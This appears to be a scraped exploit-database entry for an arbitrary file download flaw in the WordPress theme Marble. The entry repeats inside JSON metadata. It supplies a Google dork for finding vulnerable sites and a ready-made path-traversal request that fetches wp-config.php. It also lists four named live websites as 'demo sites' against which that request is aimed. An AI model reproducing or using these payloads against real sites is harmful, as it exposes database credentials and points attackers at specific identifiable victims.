ID 1337DAY-ID-22650
Type zdt
Reporter null_pointer
Modified 2014-09-17T00:00:00
Description
Exploit for php platform in category web applications
Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability
Exploit Author : NULL_Pointer
Date : 17/09/2014
Vendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650
Version: 1.1.2
Google Dork : inurl:"/wp-content/themes/marble/"
Tested on : Linux, Windows 7
--------------------------------------------------------------
WordPress Theme Marble suffers from Arbitrary File Download Vulnerability.
Exploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]
Demo Sites :
http://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# 0day.today [2018-04-02] #
{"id": "1337DAY-ID-22650", "bulletinFamily": "exploit", "title": "WordPress Theme Marble Arbitrary File Download Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2014-09-17T00:00:00", "modified": "2014-09-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/22650", "reporter": "null_pointer", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-02T21:31:07", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:25:30", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "hash": "b9e26a820b040f37619b35d34e8c0481876e9060bb27c158fa84946381483f3d", "hashmap": [{"hash": "155e59596c830b17290f2d7984bcc7de", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "52b89df2e22e15c3d2c162778815a51e", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e5fd65f28401ece7c8d8ab1dc181a43c", "key": "reporter"}, {"hash": "f170f2f63087a64ea9e1f15156b68e04", "key": "sourceData"}, {"hash": "e771aed2608208fcd629fdbc3a498f30", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "33a34d32db0fbd47c51c03c1b1ba7171", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e771aed2608208fcd629fdbc3a498f30", "key": "published"}], "history": [], "href": "http://0day.today/exploit/description/22650", "id": "1337DAY-ID-22650", "lastseen": "2016-04-20T01:25:30", "modified": "2014-09-17T00:00:00", "objectVersion": "1.0", "published": "2014-09-17T00:00:00", "references": [], "reporter": "null_pointer", "sourceData": "Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability\r\n\r\nExploit Author : NULL_Pointer\r\n\r\nDate : 17/09/2014\r\n\r\nVendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650\r\n\r\nVersion: 1.1.2\r\n\r\nGoogle Dork : inurl:\"/wp-content/themes/marble/\"\r\n\r\nTested on : Linux, Windows 7\r\n\r\n--------------------------------------------------------------\r\n\r\nWordPress Theme Marble suffers from Arbitrary File Download Vulnerability.\r\n\r\nExploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]\r\n\r\nDemo Sites :\r\n\r\nhttp://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/22650", "title": "WordPress Theme Marble Arbitrary File Download Vulnerability", "type": "zdt", "viewCount": 6}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:25:30"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "ae66ce2c03b62d362e2fffa3325b1c33"}, {"key": "modified", "hash": "e771aed2608208fcd629fdbc3a498f30"}, {"key": "published", "hash": "e771aed2608208fcd629fdbc3a498f30"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e5fd65f28401ece7c8d8ab1dc181a43c"}, {"key": "sourceData", "hash": "9383cd9d0fdb14c0973895d3ecfe2ca0"}, {"key": "sourceHref", "hash": "eea27d7b826dce73c2a0721b47d7d39f"}, {"key": "title", "hash": "155e59596c830b17290f2d7984bcc7de"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "f13d66f808b320063342210e74a2123137f1336e15a7c96cda502306cf52ecaf", "viewCount": 7, "enchantments": {"vulnersScore": 5.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/22650", "sourceData": "Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability\r\n\r\nExploit Author : NULL_Pointer\r\n\r\nDate : 17/09/2014\r\n\r\nVendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650\r\n\r\nVersion: 1.1.2\r\n\r\nGoogle Dork : inurl:\"/wp-content/themes/marble/\"\r\n\r\nTested on : Linux, Windows 7\r\n\r\n--------------------------------------------------------------\r\n\r\nWordPress Theme Marble suffers from Arbitrary File Download Vulnerability.\r\n\r\nExploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]\r\n\r\nDemo Sites :\r\n\r\nhttp://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\n\n# 0day.today [2018-04-02] #"}
{"result": {}}